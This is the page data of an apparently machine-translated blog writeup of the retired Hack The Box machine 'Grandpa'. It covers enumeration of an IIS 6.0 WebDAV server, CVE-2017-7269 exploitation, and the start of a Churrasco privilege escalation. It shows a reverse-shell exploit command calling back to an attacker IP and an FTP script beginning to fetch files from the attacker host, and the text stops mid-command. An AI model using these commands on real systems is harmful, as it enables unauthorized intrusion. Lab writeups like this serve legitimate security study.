{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-grandpa-en","result":{"data":{"markdownRemark":{"id":"86c75e68-c28d-5b18-95b9-ce76093bd72d","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-grandpa\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/598fc82bb08f81fbaaa4aab930820dd3/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABX0lEQVQY0x2PTW8SURiF51+4d6MbTcuAhbnzcYeZAQb5aJiGaR0+RALRSKCh1lTa0tq6c6WLpqumSxO3bvwJ/qn7eGFxcnLenDw5r3G9OuHL6VxdrRZ0D1PqnZRGkrKfZiRvBmSjib51scMaftxkzwu1t3SOcaK6VkzBKWMKqbQwfj9eqj+/vvPv7wNf10tGH+Ycfz5jOlswW55ytr6mP57i19sk2WAL7xz1GIwnpP0R2bspRRltgOTtQBnrmxY/fq7U/d0t39afaHXf6lXvkdU2btjSsI/4UZN8O8OMOuzKBk5Y5mRoY0uPKHTZKfmYlqN2iiZGO32qxrOYi/Mh49EBQeLSOAqpHHjUDgXNXplg38OqSMJEQ2KPvCgjpK9f9dlzpV4XsGuZhN0nyniRe6YLz5UrX+mCg6gKRM1CVGzcusCJLeyaTSlwcF8L7S45yycn9KqtNq/qXHLUy4LJf3H/wNmxBWKzAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/598fc82bb08f81fbaaa4aab930820dd3/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/598fc82bb08f81fbaaa4aab930820dd3/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/598fc82bb08f81fbaaa4aab930820dd3/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the retired HackTheBox machine “Grandpa.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#enumeration\">Enumeration</a></p>\n<ul>\n<li><a href=\"#port-scan\">Port Scan</a></li>\n<li><a href=\"#webdav-scan\">WebDAV Scan</a></li>\n<li><a href=\"#exploitation\">Exploitation</a></li>\n</ul>\n</li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<h3 id=\"port-scan\" style=\"position:relative;\"><a href=\"#port-scan\" aria-label=\"port scan permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Port Scan</h3>\n<p>I start by running Nmap.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nPORT   STATE SERVICE VERSION\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Microsoft IIS httpd <span class=\"token number\">6.0</span>\n<span class=\"token operator\">|</span> http-methods: \n<span class=\"token operator\">|</span>_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH\n<span class=\"token operator\">|</span>_http-title: Under Construction\n<span class=\"token operator\">|</span> http-webdav-scan: \n<span class=\"token operator\">|</span>   Server Date: Sat, 04 Jun <span class=\"token number\">2022</span> 01:01:45 GMT\n<span class=\"token operator\">|</span>   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\n<span class=\"token operator\">|</span>   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\n<span class=\"token operator\">|</span>   WebDAV type: Unknown\n<span class=\"token operator\">|</span>_  Server Type: Microsoft-IIS/6.0\n<span class=\"token operator\">|</span>_http-server-header: Microsoft-IIS/6.0\nService Info: OS: Windows<span class=\"token punctuation\">;</span> CPE: cpe:/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">28.16</span> seconds</code></pre></div>\n<p>IIS appears to be running, so I access it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 612px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2533fe676689a33affdb40498991d33/8c76f/image-20220604100328237.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 57.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABgUlEQVQoz42T626CQBCFff9Hsz+tqWkTsVhgFxYWEAhyOz2zXqJFG0mGnSXwzZzZwyIIDqiqBjbLkOe5izRNUZYlXrmmabrbL9brmoASh4PEwYGKonB527Y4Ho9omprRoK5rF6e8wTAMM+ii647uoyiKoLVGEATwfZ+xx56r5+1gTIqGICkixaqqYl6h7/s5UG5d18H/3hEaYr/3sdt5hCSUb5Ek2o0gLyyy1JwVyGiyK2gG7PuBgNxJTxJCmLftAGmAtahgOsfIPVdG246U/AQos9DaIo5zRCqDilJKVvj5iRkaYWjYfcpxJFSg3XNjSpxGOD0C9uwqJlA5mUqF7FT2moUU8wRZZmBtRhWSpxjH2/k96NBa6w6leNEud1JvnLO4JCOhSkXYfHxgu/UoM8Tn1xe2nuesIv6UExbLXGDTZf0r+XLSYpP39Rqr1YrQLTabDZbLN1egplXkhMWbeACadziOqOgzsUgcx252shpjrl09+ztmwP9euIXcdvWsw18GHqISN7Sz5gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2533fe676689a33affdb40498991d33/8ac56/image-20220604100328237.webp 240w,\n/static/b2533fe676689a33affdb40498991d33/d3be9/image-20220604100328237.webp 480w,\n/static/b2533fe676689a33affdb40498991d33/d1d8c/image-20220604100328237.webp 612w\"\n              sizes=\"(max-width: 612px) 100vw, 612px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2533fe676689a33affdb40498991d33/8ff5a/image-20220604100328237.png 240w,\n/static/b2533fe676689a33affdb40498991d33/e85cb/image-20220604100328237.png 480w,\n/static/b2533fe676689a33affdb40498991d33/8c76f/image-20220604100328237.png 612w\"\n            sizes=\"(max-width: 612px) 100vw, 612px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2533fe676689a33affdb40498991d33/8c76f/image-20220604100328237.png\"\n            alt=\"image-20220604100328237\"\n            title=\"image-20220604100328237\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since I couldn’t gather much information, I run gobuster for enumeration.</p>\n<p>Several paths were found.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ gobuster <span class=\"token function\">dir</span> -u http://<span class=\"token variable\">$RHOST</span>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t <span class=\"token number\">40</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> gobuster1.txt\n\n/images               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">152</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/images/<span class=\"token punctuation\">]</span>\n/Images               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">152</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/Images/<span class=\"token punctuation\">]</span>\n/IMAGES               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">152</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/IMAGES/<span class=\"token punctuation\">]</span> \n/_private             <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">403</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">1529</span><span class=\"token punctuation\">]</span> </code></pre></div>\n<ul>\n<li>Images</li>\n</ul>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 417px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0b73291b0d4076d3a6914778a9962a12/f27fb/image-20220604100519971.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 46.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB3klEQVQoz62PTWsaURSG78JFXdmdsXYyilFj1WzSRlEhFuLG/k43goo6jqVQoVHbGmiS0lWzMInfM3e0fiSCKL49c0XoD+iFh/Pxvufce5nlBcOrY4YDuwOS9BoOhwMulwybzSZySZJgt9thsVhgtVrBGCPtpeibOJ1OyLJMMy6RM0mihtuJw0MZbrcbHo+HOILX6xX4/X6B2T+i2ow+nw+BQEBgama9h52ETxA4fiNuCAaDCIdDOD19i2TyPWKxOGLxOKLRKCKRCNLpD0QaF6kLpFIpJBIJnJ8ncXb2DqFQiGbDYNlsFvl8HuVyGaVSSVCpVETMFwoiVxQF1epHqKqKXC4notk3KRaLKJBvD2s2G8hkMrhqfcdlvY56vYH65Rc8drq4ub5GrVaDUlGhKkU0vn5DpVxCo9lEuVhA9dNntFot/HsY5xztdhuDfh+9Xh+dbhcP923o3MBee+x08OvnLX7c3GI4HKJP3ru732jfP0DXdbFos9kI2Hw+w3yxwHQ6xWw+x2QyofzPriYWpC2XS1E/Pz2J2vQsl89ibjabYTAYYr1e7144GY+h6VzcNBqNSBxQHELTNOiEpukwDINe1cOYvJx8podznX7BwQ1O2gCr1Wq3EP/xbLdb/AWUowg/ebX4FgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0b73291b0d4076d3a6914778a9962a12/8ac56/image-20220604100519971.webp 240w,\n/static/0b73291b0d4076d3a6914778a9962a12/b6b2f/image-20220604100519971.webp 417w\"\n              sizes=\"(max-width: 417px) 100vw, 417px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0b73291b0d4076d3a6914778a9962a12/8ff5a/image-20220604100519971.png 240w,\n/static/0b73291b0d4076d3a6914778a9962a12/f27fb/image-20220604100519971.png 417w\"\n            sizes=\"(max-width: 417px) 100vw, 417px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0b73291b0d4076d3a6914778a9962a12/f27fb/image-20220604100519971.png\"\n            alt=\"image-20220604100519971\"\n            title=\"image-20220604100519971\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<ul>\n<li>_private</li>\n</ul>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 697px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a7e2839977c2fd3b80b3dae70703437a/7422e/image-20220604101247760.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 83.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACxUlEQVQ4y5VU204TURTtNxguYiQGQqLRqDwgvhBexBeJSIzRb9OooUIo0Co/IQkBlCANlMt02k6nt+l0pp1OL9OW5d57KmkN8XKSlb3P7jlr1r6cBq4NjODJ3DwWXrzGs/mXeL7wSvzFxTd4OPkYg8OjGBi62Ychig2P3LoSgfsPHmFqagYzM3OYnX2K6elZAccmbk9ibPweJu5M9mF07C4Gro9h8MY4Bkf6EQiHN7Gx8Rnh8BdEIptYX49gbS2CUCiMTytrWCas0n55dR3B5RCCKyF8XFrB2/dLePchSFjqIigIgJbnNdFqeWi3W2RbXb8Nr9lEo1EX/OsK2LaFbDaLdDoNXc8I0rqOfD4v8VQqRdBQNE005QMN1Ot11Gp1uK4rPlvP88UIoaLE5eK5oiAeV6CqCZyenpIfp98UsbFYDLHjGJ05l5iqqnKOz/NdzkgUWlZJ1HEwkUyKnySbSCTEJsnyZSZlqLQ3Sa3jOKhWq6hUKgRH1AthrVZDsViUA+VyWQ5zGv+7Op2OT3hxcYEa1SCT0aGROk3TUCgYYOWGYcjHbNuGbVnkmyiV/DhbBp9lIbyYK8DMnuchl8sSaUYus2pOh4vtOJWudbrF9yS9XnDsktAkBVwbTaNuJlPS2bjiN4brKbUicCmY8E9LCDndglGQ1PKFgsCk9AwiYFvhwhNhk8aClfDY/A6ueU9TXJq5HHI0d0VSZxIs9jNZGKQwR903aDYbVVcU/ipFL+pEyuqEUKRSHXlw88fHqNC8uZSyS2VAySKUBB2zKEptu3xJ7Dj+2LjkX6bMDsvlOTyMRvF9fx+HR0cy5Do1KUF1TetpZHN5mU2N55UtTQODXxaT9inkJxONHuLHwQFOTmLY3t7GPhFvbW1hd2cHe3u7hG+0/4qzszP5uD/8qjxRnpT+lGnDpFxg/pGfUS845v9ptP7a5Z+P7J/rvFuGMgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a7e2839977c2fd3b80b3dae70703437a/8ac56/image-20220604101247760.webp 240w,\n/static/a7e2839977c2fd3b80b3dae70703437a/d3be9/image-20220604101247760.webp 480w,\n/static/a7e2839977c2fd3b80b3dae70703437a/458b7/image-20220604101247760.webp 697w\"\n              sizes=\"(max-width: 697px) 100vw, 697px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a7e2839977c2fd3b80b3dae70703437a/8ff5a/image-20220604101247760.png 240w,\n/static/a7e2839977c2fd3b80b3dae70703437a/e85cb/image-20220604101247760.png 480w,\n/static/a7e2839977c2fd3b80b3dae70703437a/7422e/image-20220604101247760.png 697w\"\n            sizes=\"(max-width: 697px) 100vw, 697px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a7e2839977c2fd3b80b3dae70703437a/7422e/image-20220604101247760.png\"\n            alt=\"image-20220604101247760\"\n            title=\"image-20220604101247760\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This alone doesn’t give me a useful foothold.</p>\n<p>I also tried feroxbuster, but nothing useful came up.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ feroxbuster -u http://<span class=\"token variable\">$RHOST</span>/  -x asp,aspx -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> feroxbuster.txt</code></pre></div>\n<h3 id=\"webdav-scan\" style=\"position:relative;\"><a href=\"#webdav-scan\" aria-label=\"webdav scan permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>WebDAV Scan</h3>\n<p>Next, I use <code class=\"language-text\">davtest</code> to check WebDAV.</p>\n<p>Simply put, WebDAV is an HTTP-based file transfer mechanism.</p>\n<p>Using DAVTest, I can check whether WebDAV is running.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ /usr/bin/davtest -url http://<span class=\"token variable\">$RHOST</span>/\n********************************************************\n Testing DAV connection\nOPEN            SUCCEED:                http://<span class=\"token variable\">$RHOST</span>\n********************************************************\nNOTE    Random string <span class=\"token keyword\">for</span> this session: raQC3An4\n********************************************************\n Creating directory\nMKCOL           FAIL\n********************************************************\n Sending <span class=\"token builtin class-name\">test</span> files\nPUT     jhtml   FAIL\nPUT     cfm     FAIL\nPUT     cgi     FAIL\nPUT     jsp     FAIL\nPUT     txt     FAIL\nPUT     pl      FAIL\nPUT     php     FAIL\nPUT     shtml   FAIL\nPUT     asp     FAIL\nPUT     html    FAIL\nPUT     aspx    FAIL\n\n********************************************************</code></pre></div>\n<p>Reference: <a href=\"https://whitemarkn.com/learning-ethical-hacker/davtest/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Hackers Test WebDAV-Enabled Servers with DAVTest (Kali Linux) | Become a White Hat Hacker Using AI</a></p>\n<p>Reference: <a href=\"https://nmap.org/nsedoc/scripts/http-webdav-scan.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">http-webdav-scan NSE script — Nmap Scripting Engine documentation</a></p>\n<p>I had confirmed from nmap’s <code class=\"language-text\">http-webdav-scan</code> results that several methods were available, but unfortunately it seems they can’t be used directly.</p>\n<h3 id=\"exploitation\" style=\"position:relative;\"><a href=\"#exploitation\" aria-label=\"exploitation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploitation</h3>\n<p>However, it turns out that IIS 6.0’s WebDAV has a vulnerability allowing authentication bypass, which can be used for arbitrary code execution.</p>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/41738\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow - Windows remote Exploit</a></p>\n<p>I used the following exploit code:</p>\n<p>Reference: <a href=\"https://gist.github.com/g0rx/693a89197e0b9d1464cab536fdc9f933\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">iis6-exploit-2017-CVE-2017-7269</a></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">root@pentestlab:~<span class=\"token comment\"># python revshell.py </span>\nusage:iis6webdav.py targetip targetport reverseip reverseport\n\nroot@pentestlab:~<span class=\"token comment\"># python revshell.py 10.10.10.14 80 10.10.14.2 9999</span></code></pre></div>\n<p>This gave me a reverse shell.</p>\n<p>Unfortunately, however, I couldn’t obtain the user flag with the shell I got.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">whoami</span>\nnt authority<span class=\"token punctuation\">\\</span>network <span class=\"token function\">service</span></code></pre></div>\n<p>So I’ll work toward privilege escalation.</p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>As usual, I check the user’s privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">whoami</span> /pri\nPRIVILEGES INFORMATION\n----------------------\nPrivilege Name                Description                               State   \n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span> <span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span> <span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span>\nSeAuditPrivilege              Generate security audits                  Disabled\nSeIncreaseQuotaPrivilege      Adjust memory quotas <span class=\"token keyword\">for</span> a process        Disabled\nSeAssignPrimaryTokenPrivilege Replace a process level token             Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled \nSeImpersonatePrivilege        Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege       Create global objects                     Enabled </code></pre></div>\n<p><code class=\"language-text\">SeImpersonatePrivilege</code> is enabled!</p>\n<p><code class=\"language-text\">SeImpersonatePrivilege</code> is a privilege that allows a server to impersonate a client’s credentials.</p>\n<p>When this privilege is enabled, attacks such as Named Pipe Impersonation become possible.</p>\n<p>Reference: <a href=\"https://note.com/lacnote/n/nef29b7c6a94f\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What’s Inside getsystem | Lac Security Stew Blog | note</a></p>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Named Pipe Client Impersonation - HackTricks</a></p>\n<p>There are several attack methods, but on Windows Server 2003, when <code class=\"language-text\">SeImpersonatePrivilege</code> is assigned to <code class=\"language-text\">network service</code>, Churrasco can be used to obtain elevated privileges.</p>\n<p>So I transferred a file via FTP to the writable folder <code class=\"language-text\">C:\\wmpub\\</code> and executed the exploit.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> <span class=\"token function\">open</span> <span class=\"token number\">10.10</span>.14.3 <span class=\"token operator\">></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> user user password <span class=\"token operator\">>></span> ftp.txt <span class=\"token 